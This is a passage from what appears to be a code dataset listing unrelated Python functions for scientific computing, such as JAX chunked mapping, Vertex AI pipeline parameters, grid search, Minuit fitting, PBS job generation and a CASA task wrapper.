chunk_size)\n return x_chunks\n\n def _get_rest(x):\n x_rest = jax.tree_map(lambda x_: x_[n_elements - n_rest :, ...], x)\n return x_rest\n\n args_chunks = [\n _get_chunks(a) if i in argnums else a for i, a in enumerate(args)\n ]\n args_rest = [\n _get_rest(a) if i in argnums else a for i, a in enumerate(args)\n ]\n\n y_chunks = _unchunk(\n scanmap(vmapped_fun, scan_append, argnums)(*args_chunks)\n )\n\n if n_rest == 0:\n y = y_chunks\n else:\n y_rest = vmapped_fun(*args_rest)\n y = jax.tree_map(\n lambda y1, y2: jnp.concatenate((y1, y2)), y_chunks, y_rest\n )\n return y\n\n return _fun", "def fun_par_dict(fun: Callable, *args):\n if len(args) > 0:\n return fun(*args[:-1], **args[-1])\n else:\n return fun()", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def grid_search(func, param_grid, wrapper=None, n_jobs=1, verbose=0):\n if wrapper is None:\n wrapper = _default_wrapper\n # check if enough memory\n size_ = _get_final_size(param_grid)\n if size_ > 0.9 * psutil.virtual_memory().available:\n raise MemoryError(\"not enough memory 'param_grid'\"\n \" weigh {0} ..\".format(humanize.naturalsize(size_)))\n # sanitize value to list type\n for key, value in param_grid.iteritems():\n if not isinstance(value, list):\n param_grid[key] = [value]\n list_kwargs = [dict(zip(param_grid, x))\n for x in itertools.product(*param_grid.values())]\n # Run the reconstruction\n if verbose > 0:\n if n_jobs == -1:\n n_jobs_used = psutil.cpu_count()\n elif n_jobs == -2:\n n_jobs_used = psutil.cpu_count() - 1\n else:\n n_jobs_used = n_jobs\n print((\"Running grid_search for {0} candidates\"\n \" on {1} jobs\").format(len(list_kwargs), n_jobs_used))\n res = Parallel(n_jobs=n_jobs, verbose=verbose)(\n delayed(wrapper)(func, **kwargs)\n for kwargs in list_kwargs)\n return list_kwargs, res", "def c_torch_score_mp(ve, xs, y, func_index, n_jobs=1, return_numpy=False, clf=False, single_start=6):\n if isinstance(ve, np.ndarray):\n ve = ve.tolist()\n if n_jobs == 1:\n return c_torch_score(ve, xs, y, func_index, return_numpy, clf, single_start=single_start)\n else:\n for i in range(3):\n print(\"For torch with c++ (c_torch), with n_jobs>1, this function is very slow!\")\n\n pool = Pool(n_jobs)\n\n left = int(len(ve) % n_jobs)\n\n if left > 0:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n nve.append(ve[-left:])\n else:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n\n res = []\n for nvei in nve:\n ret = pool.apply(c_torch_score_temp, (nvei, xs, y, func_index, clf, single_start))\n res.append(ret)\n pool.close()\n pool.join()\n\n if not return_numpy:\n res = torch.cat(res)\n else:\n res = np.concatenate(res)\n return res", "def jac_pnp(beta, **kw):\n temp = kw.get('temp', 85)\n rate_source_ = kw.get('rate_source', 1E-4)\n DSIN_ = kw.get('DSIN', 3.92E-16)\n stress_voltage = kw.get('stress_voltage', 3.75)\n L1_ = kw.get('L1', 0.075)\n N1_ = int(kw.get('N1', 100))\n tsteps_ = int(kw.get('tsteps', 720))\n time_s = kw.get('time_s', np.array([0]))\n rsh_norm_ = kw.get('rsh_norm', np.array([0]))\n print('Called jac_pnp')\n\n S0_ = 10 ** beta[0]\n h_ = 10 ** beta[1]\n DSF_ = 10 ** beta[2]\n # y0 = ml_pid.simulate_rsh(\n # S0=S0_, h=h_, DSF=DSF_, simulation_time=np.amax(time_s) * 1.1,\n # temperature=temp, rate_source=rate_source_, DSIN=DSIN_,\n # stress_voltage=stress_voltage, L1=L1_, m=1, time_steps=tsteps_,\n # N1=N1_\n # )\n\n EPS_ = np.finfo(np.float).eps\n delta = EPS_ ** (1 / 3)\n delta = 1E-1\n\n # forward\n # derivparams_forward = []\n derivparams = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] += delta\n derivparams.append(copy)\n # backward\n # derivparams_backward = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] -= delta\n derivparams.append(copy)\n\n # results_forward = pool.map(partial(func, **kw), derivparams_forward)\n # results_backward = pool.map(partial(func, **kw), derivparams_backward)\n results = np.array(pool.map(partial(func, **kw), derivparams))\n [m, n] = results.shape\n idx = int(m / 2)\n results_forward = results[0:idx, :]\n results_backward = results[idx::,:]\n derivs = [(rf - rb) / (2.0 * delta) for rf, rb in zip(results_forward, results_backward)]\n return np.array(derivs).T", "def run_migrad(self, fitarg, **kwargs):\n self.fitarg = fitarg\n kwargs['up'] = 1.\n\n\n logging.debug(self._par_names)\n logging.debug(self.__wrap_likelihood(list(fitarg['pinit'].values())))\n\n if kwargs['scipy']:\n self._res = op.minimize(self.__wrap_likelihood,\n list(fitarg['pinit'].values()),\n bounds=list(fitarg['limits'].values()),\n method='TNC',\n #method='Powell',\n options={'maxiter': kwargs['ncall']} #'xtol': 1e-20, 'eps' : 1e-20, 'disp': True}\n #tol=None, callback=None,\n #options={'disp': False, 'minfev': 0, 'scale': None,\n #'rescale': -1, 'offset': None, 'gtol': -1,\n #'eps': 1e-08, 'eta': -1, 'maxiter': kwargs['ncall'],\n #'maxCGit': -1, 'mesg_num': None, 'ftol': -1, 'xtol': -1, 'stepmx': 0,\n #'accuracy': 0}\n )\n logging.info(self._res)\n for i, k in enumerate(self._par_names):\n fitarg[k] = self._res.x[i]\n\n logging.debug(fitarg)\n\n cmd_string = \"lambda {0}: self.__calcLikelihood({0})\".format(\n (\", \".join(self._par_names), \", \".join(self._par_names)))\n\n string_args = \", \".join(self._par_names)\n global f # needs to be global for eval to find it\n f = lambda *args: self.__calc_likelihood(*args)\n\n cmd_string = \"lambda %s: f(%s)\" % (string_args, string_args)\n logging.debug(cmd_string)\n\n # work around so that the parameters get names for minuit\n self._minimize_f = eval(cmd_string, globals(), locals())\n self._minimize_f.errordef = minuit.Minuit.LEAST_SQUARES\n\n self._m = minuit.Minuit(self._minimize_f,\n #list(fitarg['pinit'].values()),\n **fitarg['pinit'],\n #names=self._par_names\n )\n# print_level=kwargs['verbosity'],\n# errordef=kwargs['up'],\n# pedantic=kwargs['pedantic'],\n #**fitarg)\n\n for p in self._par_names:\n self._m.fixed[p] = fitarg['fix'][p]\n self._m.limits[p] = fitarg['limits'][p]\n self._m.errors[p] = fitarg['error'][p]\n\n self._m.tol = kwargs['tol']\n self._m.strategy = kwargs['strategy']\n\n logging.debug(\"tol {0:.2e}, strategy: {1:n}\".format(\n self._m.tol, self._m.strategy.strategy))\n\n self._m.migrad(ncall=kwargs['ncall']) #, precision = kwargs['precision'])", "def effective_n_jobs(n_jobs=-1):\n if n_jobs == 1:\n return 1\n\n backend, backend_n_jobs = get_active_backend()\n if n_jobs is None:\n n_jobs = backend_n_jobs\n return backend.effective_n_jobs(n_jobs=n_jobs)", "def run_on_server(func_master, *args, **kwargs):\n\n from gausspy.gaussian_job_manager import Job\n #we can pass in job_obj details with the function/class if we wish\n try:\n func_obj, job_obj = func_master\n except TypeError:\n func_obj = func_master\n job_obj = None\n\n try:\n name = func_obj.calc.label\n except AttributeError:\n try:\n name = func_obj.func_name\n except AttributeError:\n name = 'unknown'\n\n name += '_' + str(uuid.uuid1())\n\n \n #this means functions that actually have an inc_session keyword argument\n #will have the value stripped out (I'm hoping we don't come across any)\n try:\n inc_session = kwargs.pop('inc_session')\n except KeyError:\n inc_session=False\n\n try:\n savefiles = kwargs.pop('savefiles')\n except KeyError:\n savefiles = ''\n\n try: \n namefile_f = kwargs.pop('namefile_f')\n except KeyError:\n namefile_f = lambda e: name\n try:\n compress = kwargs.pop('compress')\n except KeyError:\n compress = False\n \n if inc_session:\n dill.dump_session(name + '_session.pkl')\n\n with open(name + '.pkl', 'w') as f:\n dill.dump([func_obj, args, kwargs], f)\n\n serv_home = config.get('gaussian', 'gauss_home')\n path = os.path.join(serv_home + get_active_path(), '')\n serv_work = config.get('gaussian', 'gauss_scratch')\n scratch_path = os.path.join(serv_work + get_active_path(), '')\n #if we have set the ASE and Gaussian home/work directories to nothing. I.e. we are running on the node\n #then the only way of recovering the original directories is to use the PBS shell variables that contain the directory\n #that the job was submitted from (which is the correct home directory).\n\n #scratch_path = os.environ['PBS_O_WORKDIR '].replace('/home','/work')\n\n exec_command = 'execute_calc {f_pckl};'.format(\n pth=path,\n f_pckl=path + name + '.pkl')\n\n if compress and savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n exec_command += 'tar -cvjf {n}.tar.bz2 {f};'.format(n=name, f=savefiles)\n exec_command += 'cp {n}.tar.bz2 {scratch};'.format(n=name, scratch=scratch_path)\n elif savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n #exec_command += 'find . -maxdepth 1 ! -iregex \"{r}\" -exec cp -r {} {scratch} \\;'.format(r=savefiles, scratch=scratch_path)\n exec_command += 'cp {f} {scratch};'.format(f=savefiles, scratch=scratch_path)\n\n if not job_obj:\n try:\n nodes = func_obj.calc.job_params['nodes']\n mem = func_obj.calc.job_params['memory'] + nodes * 150\n time = func_obj.calc.job_params['time']\n queue = func_obj.calc.job_params['queue']\n\n job_obj = Job(procs=nodes, memory=mem, walltime=time, queue=queue)\n except AttributeError:\n job_obj = Job()\n\n script = job_obj.gen_header() + exec_command\n\n with open(name + '_job_script.sh', 'w') as f:\n f.write(script)\n\n if inc_session:\n extra_files = [name + '.pkl', name + '_session.pkl']\n else:\n extra_files = [name + '.pkl']\n\n submission = remote.qsub(os.getcwd() + '/' + name + '_job_script.sh', extra_files=extra_files)\n\n os.remove(name + '.pkl')\n\n try:\n os.remove(name + '_session.pkl')\n except OSError:\n pass\n\n return submission", "def test_generic(args):\n (tol,cons,sol,test_func,low,high,shape) = args\n #if shape == 0:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n #print('here')\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t0 = time.time()\n res = minimize_qpso(test_func, x0, tol=tol)\n t1= time.time()\n converged = res.success\n qpso_converged = 0\n qpso_nit = res.nit\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n qpso_converged = 1\n # if high is None:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n # else:\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t2= time.time()\n res = minimize(test_func,x0, tol=tol)\n t3 = time.time()\n converged = res.success\n pso_converged = 0\n pso_nit = res.nit\n assert converged, res.message\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n pso_converged = 1\n \n return qpso_converged, qpso_nit ,t1-t0, pso_converged , pso_nit , t3-t2", "def jacobian_numba(coordinates, points, jac, greens_function):\n east, north, upward = coordinates[:]\n point_east, point_north, point_upward = points[:]\n for i in prange(east.size):\n for j in range(point_east.size):\n jac[i, j] = greens_function(\n east[i],\n north[i],\n upward[i],\n point_east[j],\n point_north[j],\n point_upward[j],\n )", "def backsubstitution_numba(b, dofmap, num_dofs_per_element, mpc,\n global_indices):\n (slaves, slave_cells, cell_to_slave, cell_to_slave_offset,\n masters_local, coefficients, offsets) = mpc\n slaves_visited = numpy.empty(0, dtype=numpy.float64)\n\n # Loop through slave cells\n for (index, cell_index) in enumerate(slave_cells):\n cell_slaves = cell_to_slave[cell_to_slave_offset[index]:\n cell_to_slave_offset[index+1]]\n local_dofs = dofmap[num_dofs_per_element * cell_index:\n num_dofs_per_element * cell_index\n + num_dofs_per_element]\n\n # Find the global index of the slaves on the cell in the slaves-array\n global_slaves_index = []\n for gi in range(len(slaves)):\n if in_numpy_array(cell_slaves, slaves[gi]):\n global_slaves_index.append(gi)\n\n for slave_index in global_slaves_index:\n slave = slaves[slave_index]\n k = -1\n # Find local position of slave dof\n for local_dof in local_dofs:\n if global_indices[local_dof] == slave:\n k = local_dof\n assert k != -1\n # Check if we have already inserted for this slave\n if not in_numpy_array(slaves_visited, slave):\n slaves_visited = numpy.append(slaves_visited, slave)\n slaves_masters = masters_local[offsets[slave_index]:\n offsets[slave_index+1]]\n slaves_coeffs = coefficients[offsets[slave_index]:\n offsets[slave_index+1]]\n for (master, coeff) in zip(slaves_masters, slaves_coeffs):\n b[k] += coeff*b[master]", "def create_job(jobrun, vcf_filenames):\n if jobrun == \"cluster\":\n \"\"\"\n Supports only PBS clusters for now.\n \"\"\"\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n for i in pbs_scripts:\n print \"Running: qsub %s\" % i\n #os.system(\"qsub %s\" % i)\n\n elif jobrun == \"parallel-local\":\n \"\"\"\n Generate a Command list of each job and run it in parallel on different cores available on local system\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n f3 = open(command_file, 'w+')\n\n\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n\n\n for i in pbs_scripts:\n f3.write(\"bash %s\\n\" % i)\n f3.close()\n with open(command_file, 'r') as fpp:\n for lines in fpp:\n lines = lines.strip()\n command_array.append(lines)\n fpp.close()\n print len(command_array)\n if args.numcores:\n num_cores = int(num_cores)\n else:\n num_cores = multiprocessing.cpu_count()\n results = Parallel(n_jobs=num_cores)(delayed(run_command)(command) for command in command_array)\n\n elif jobrun == \"parallel-single-cluster\":\n print \" \"\n else:\n \"\"\"\n Generate a Command list of each job and run it on local system one at a time\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n os.system(\"bash %s\" % command_file)", "def default_params(defaults):\n def wrap(function):\n def withargs(*args, **kwargs):\n merged = {}\n merged.update(defaults)\n merged.update(kwargs)\n return function(*args, **merged)\n return withargs\n return wrap", "def __call__(self, imagename=None, box=None, region=None, chans=None, stokes=None, axis=None, mask=None, minpts=None, multifit=None, spxtype=None, spxest=None, spxfix=None, div=None, spxsol=None, spxerr=None, model=None, residual=None, wantreturn=None, stretch=None, logresults=None, logfile=None, append=None, sigma=None, outsigma=None, ):\n if not hasattr(self, \"__globals__\") or self.__globals__ == None :\n self.__globals__=stack_frame_find( )\n #casac = self.__globals__['casac']\n casalog = self.__globals__['casalog']\n casa = self.__globals__['casa']\n #casalog = casac.casac.logsink()\n self.__globals__['__last_task'] = 'spxfit'\n self.__globals__['taskname'] = 'spxfit'\n ###\n self.__globals__['update_params'](func=self.__globals__['taskname'],printtext=False,ipython_globals=self.__globals__)\n ###\n ###\n #Handle globals or user over-ride of arguments\n #\n if type(self.__call__.func_defaults) is NoneType:\n function_signature_defaults={}\n else:\n function_signature_defaults=dict(zip(self.__call__.func_code.co_varnames[1:],self.__call__.func_defaults))\n useLocalDefaults = False\n\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n if (keyVal == None):\n #user hasn't set it - use global/default\n pass\n else:\n #user has set it - use over-ride\n if (key != 'self') :\n useLocalDefaults = True\n\n myparams = {}\n if useLocalDefaults :\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n exec('myparams[key] = keyVal')\n self.parameters[key] = keyVal\n if (keyVal == None):\n exec('myparams[key] = '+ key + ' = self.itsdefault(key)')\n keyVal = eval(key)\n if(type(keyVal) == dict) :\n if len(keyVal) > 0 :\n exec('myparams[key] = ' + key + ' = keyVal[len(keyVal)-1][\\'value\\']')\n else :\n exec('myparams[key] = ' + key + ' = {}')\n\n else :\n print ''\n\n myparams['imagename'] = imagename = self.parameters['imagename']\n myparams['box'] = box = self.parameters['box']\n myparams['region'] = region = self.parameters['region']\n myparams['chans'] = chans = self.parameters['chans']\n myparams['stokes'] = stokes = self.parameters['stokes']\n myparams['axis'] = axis = self.parameters['axis']\n myparams['mask'] = mask = self.parameters['mask']\n myparams['minpts'] = minpts = self.parameters['minpts']\n myparams['multifit'] = multifit = self.parameters['multifit']\n myparams['spxtype'] = spxtype = self.parameters['spxtype']\n myparams['spxest'] = spxest = self.parameters['spxest']\n myparams['spxfix'] = spxfix = self.parameters['spxfix']\n myparams['div'] = div = self.parameters['div']\n myparams['spxsol'] = spxsol = self.parameters['spxsol']\n myparams['spxerr'] = spxerr = self.parameters['spxerr']\n myparams['model'] = model = self.parameters['model']\n myparams['residual'] = residual = self.parameters['residual']\n myparams['wantreturn'] = wantreturn = self.parameters['wantreturn']\n myparams['stretch'] = stretch = self.parameters['stretch']\n myparams['logresults'] = logresults = self.parameters['logresults']\n myparams['logfile'] = logfile = self.parameters['logfile']\n myparams['append'] = append = self.parameters['append']\n myparams['sigma'] = sigma = self.parameters['sigma']\n myparams['outsigma'] = outsigma = self.parameters['outsigma']\n\n if type(spxest)==float: spxest=[spxest]\n if type(spxfix)==bool: spxfix=[spxfix]\n\n result = None\n\n#\n# The following is work around to avoid a bug with current python translation\n#\n mytmp = {}\n\n mytmp['imagename'] = imagename\n mytmp['box'] = box\n mytmp['region'] = region\n mytmp['chans'] = chans\n mytmp['stokes'] = stokes\n mytmp['axis'] = axis\n mytmp['mask'] = mask\n mytmp['minpts'] = minpts\n mytmp['multifit'] = multifit\n mytmp['spxtype'] = spxtype\n mytmp['spxest'] = spxest\n mytmp['spxfix'] = spxfix\n mytmp['div'] = div\n mytmp['spxsol'] = spxsol\n mytmp['spxerr'] = spxerr\n mytmp['model'] = model\n mytmp['residual'] = residual\n mytmp['wantreturn'] = wantreturn\n mytmp['stretch'] = stretch\n mytmp['logresults'] = logresults\n mytmp['logfile'] = logfile\n mytmp['append'] = append\n mytmp['sigma'] = sigma\n mytmp['outsigma'] = outsigma\n pathname='file://' + casa['dirs']['xml'] + '/'\n trec = casac.casac.utils().torecord(pathname+'spxfit.xml')\n\n casalog.origin('spxfit')\n try :\n #if not trec.has_key('spxfit') or not casac.casac.utils().verify(mytmp, trec['spxfit']) :\n #return False\n\n casac.casac.utils().verify(mytmp, trec['spxfit'], True)\n scriptstr=['']\n saveinputs = self.__globals__['saveinputs']\n\n # Save .last file for this task execution. MPI servers don't write it (CASR-329).\n from mpi4casa.MPIEnvironment import MPIEnvironment\n do_full_logging = MPIEnvironment.is_mpi_disabled_or_client()\n if type(self.__call__.func_defaults) is NoneType:\n saveinputs=''\n else:\n saveinputs('spxfit', 'spxfit.last', myparams, self.__globals__,scriptstr=scriptstr, do_save_inputs=do_full_logging)\n\n tname = 'spxfit'\n spaces = ' '*(18-len(tname))\n casalog.post('\\n##########################################'+\n '\\n##### Begin Task: ' + tname + spaces + ' #####')\n # Don't do telemetry from MPI servers (CASR-329)\n if do_full_logging and casa['state']['telemetry-enabled']:\n #casalog.poststat('Begin Task: ' + tname)\n task_starttime = str(datetime.datetime.now())\n if type(self.__call__.func_defaults) is NoneType:\n casalog.post(scriptstr[0]+'\\n', 'INFO')\n else:\n casalog.post(scriptstr[1][1:]+'\\n', 'INFO')\n\n # Effective call to the task as defined in gcwrap/python/scripts/task_*\n result = spxfit(imagename, box, region, chans, stokes, axis, mask, minpts, multifit, spxtype, spxest, spxfix, div, spxsol, spxerr, model, residual, wantreturn, stretch, logresults, logfile, append, sigma, outsigma)\n\n if do_full_logging and casa['state']['telemetry-enabled']:\n task_endtime = str(datetime.datetime.now())\n casalog.poststat( 'Task ' + tname + ' complete. Start time: ' + task_starttime + ' End time: ' + task_endtime )\n casalog.post('##### End Task: ' + tname + ' ' + spaces + ' #####'+\n '\\n##########################################')\n\n except Exception, instance:\n if(self.__globals__.has_key('__rethrow_casa_exceptions') and self.__globals__['__rethrow_casa_exceptions']) :\n raise\n else :\n #print '**** Error **** ',instance\n tname = 'spxfit'\n casalog.post('An error occurred running task '+tname+'.', 'ERROR')\n pass\n casalog.origin('')\n\n return result", "def get_pij_numba(d, scale, i):\n \n d_scaled = -d/scale\n d_scaled -= np.max(d_scaled)\n exp_D = np.exp(d_scaled)\n exp_D[i] = 0\n \n return exp_D/np.sum(exp_D)", "def addJob(self, args, functionToRun, identifier, metadata=None, forceUseThreads = False, uniqueHandler=\"any\", clientQueue = False, groupInfo = None):\n assert \"original_function\" in dir(functionToRun), \"to parallelize a function, it must be\" \\\n \" decorated with RAVEN Parallel decorator\"\n if self._server is None or forceUseThreads:\n internalJob = Runners.factory.returnInstance('SharedMemoryRunner', args,\n functionToRun.original_function,\n 